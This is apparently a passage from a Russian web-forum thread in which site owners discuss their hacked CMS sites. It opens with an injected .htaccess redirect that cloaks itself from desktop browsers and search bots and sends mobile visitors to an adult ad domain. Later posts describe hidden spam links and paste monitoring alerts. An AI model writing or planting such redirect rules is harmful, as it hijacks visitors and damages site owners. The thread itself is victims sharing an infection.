RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

RewriteRule ^(.*)$ http://erotraxxx.ru/ads/1 [L,R=302]
Название: Re: Взывая к помощи коллективного разума!
Отправлено: narzankmv от 16 Июль 2013, 06:40:38
У меня тоже появилось :-(
Название: Re: Взывая к помощи коллективного разума!
Отправлено: alexandr от 16 Июль 2013, 09:40:49
У меня тоже появилось :-(
поменяй хостинг на какой нибудь известный. я раньше искал подешевле. потом поменял хостинг, и все отцепилось)
Название: Re: Взывая к помощи коллективного разума!
Отправлено: suravel от 04 Ноябрь 2013, 12:16:41
В очередной раз ухожу от Санты с разочарованием.
Очень давно делала сайт еще на Санте первой версии. Система нравилась, все устраивало, кроме того, что через полгода сайт взломали, в Гугле появилось сообщение, что сайт небезопасен со всеми вытекающими последствиями...
Пришлось все переделывать, объясняться с Гуглом, но через три дня все повторилось.
Разработчики уже тогда категорически отрицали уязвимость в самой cms.
Как известно, отрицание проблемы не решает саму проблему.
С тех пор, время от времени, захожу на этот форум в надежде, что проблема безопасности все-таки решена. Но нет, проблемы все те же и все также некоторые разработчики, вместо того, чтобы искать уязвимость в системе, пытаются перевести стрелки на хостинги, не задаваясь вопросом, почему сайты, сделанные на других CMS, без проблем работают на тех же хостингах.
Хотя со времени последнего визита и появились какие-то подвижки в этом направлении, вряд ли в ближайшие год-два можно будет делать сайт на этой системе.
Название: Re: Взывая к помощи коллективного разума!
Отправлено: mosyan от 27 Январь 2014, 21:13:30
Здравствуйте! Мой сайт словил вирус, притом злоумышленник разместил скрытые ссылки на моём сайте и походу ими торговал на биржах, недавно проверял сайт программкой xenu и нашёл эти ссылки. код скрыт где то в главном меню, но я его так и не смог найти установил файлик который вы опубликовали и на почту пришло следующее сообщение Hosting account   
site:www.buro-soglasovania.ru on folder: admin-off2
   20:01 (2 мин. назад)
Hosting account   
site:www.buro-soglasovania.ru on folder: admin-off
   20:01 (2 мин. назад)
Hosting account   
site:www.buro-soglasovania.ru on folder: cgi-bin
   20:01 (2 мин. назад)
Hosting account   
site:www.buro-soglasovania.ru on folder: livezilla
   20:01 (2 мин. назад)
Hosting account   
site:www.buro-soglasovania.ru on folder: postanovlenie
   20:01 (2 мин. назад)
Hosting account   
site:www.buro-soglasovania.ru on folder: admin-off2
   20:02 (2 мин. назад)
Hosting account   
site:www.buro-soglasovania.ru on folder: cgi-bin
   20:02 (2 мин. назад)
Hosting account   
site:www.buro-soglasovania.ru on folder: postanovlenie
   20:02 (2 мин. назад)
Hosting account   
site:www.buro-soglasovania.ru on folder: livezilla
   20:02 (2 мин. назад)
Hosting account   
site:www.buro-soglasovania.ru on folder: admin-off
   20:02 (2 мин. назад)